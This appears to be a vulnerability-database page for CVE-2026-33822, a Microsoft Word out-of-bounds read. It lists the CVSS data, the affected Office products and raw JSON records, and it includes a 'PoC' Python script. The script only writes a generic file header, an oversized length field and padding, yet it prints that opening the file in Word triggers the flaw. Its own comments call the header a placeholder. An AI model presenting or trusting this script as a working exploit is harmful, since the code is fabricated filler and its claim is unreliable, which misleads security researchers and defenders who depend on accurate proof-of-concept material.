Security Vulnerability Report
中文
CVE-2026-33822 CVSS 6.1 MEDIUM

CVE-2026-33822

Published: 2026-04-14 18:17:35
Last Modified: 2026-04-29 19:13:49
Source: [email protected]

Description

Out-of-bounds read in Microsoft Office Word allows an unauthorized attacker to disclose information locally.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:microsoft:365_apps:-:*:*:*:enterprise:*:x64:* - VULNERABLE
cpe:2.3:a:microsoft:365_apps:-:*:*:*:enterprise:*:x86:* - VULNERABLE
cpe:2.3:a:microsoft:office_long_term_servicing_channel:2021:*:*:*:*:macos:*:* - VULNERABLE
cpe:2.3:a:microsoft:office_long_term_servicing_channel:2024:*:*:*:*:macos:*:* - VULNERABLE
Microsoft Word 2016
Microsoft Word 2019
Microsoft Word 2021
Microsoft 365 Apps for Enterprise

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Proof of Concept (PoC) for CVE-2026-33822 # This script generates a malformed file structure to trigger the Out-of-bounds Read. # Note: Actual exploit requires specific binary structure manipulation. import struct def generate_malformed_doc(filename): # Generic DOC file header placeholder header = b'\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1' # Simulate a malformed record length that triggers OOB read # In a real scenario, this would target a specific parser offset malformed_record = struct.pack('<I', 0xFFFFFFFF) with open(filename, 'wb') as f: f.write(header) f.write(malformed_record) # Fill rest with padding f.write(b'A' * 1000) print(f"Malformed file generated: {filename}") print("Open this file in Microsoft Word to trigger the vulnerability.") if __name__ == "__main__": generate_malformed_doc('cve_2026_33822_poc.doc')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33822", "sourceIdentifier": "[email protected]", "published": "2026-04-14T18:17:34.590", "lastModified": "2026-04-29T19:13:49.190", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Out-of-bounds read in Microsoft Office Word allows an unauthorized attacker to disclose information locally."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:365_apps:-:*:*:*:enterprise:*:x64:*", "matchCriteriaId": "3259EBFE-AE2D-48B8-BE9A-E22BBDB31378"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:365_apps:-:*:*:*:enterprise:*:x86:*", "matchCriteriaId": "CD25F492-9272-4836-832C-8439EBE64CCF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:office_long_term_servicing_channel:2021:*:*:*:*:macos:*:*", "matchCriteriaId": "BF0E8112-5B6F-4E55-8E40-38ADCF6FC654"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:office_long_term_servicing_channel:2024:*:*:*:*:macos:*:*", "matchCriteriaId": "EF3E56B5-E6A6-4061-9380-D421E52B9199"}]}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33822", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.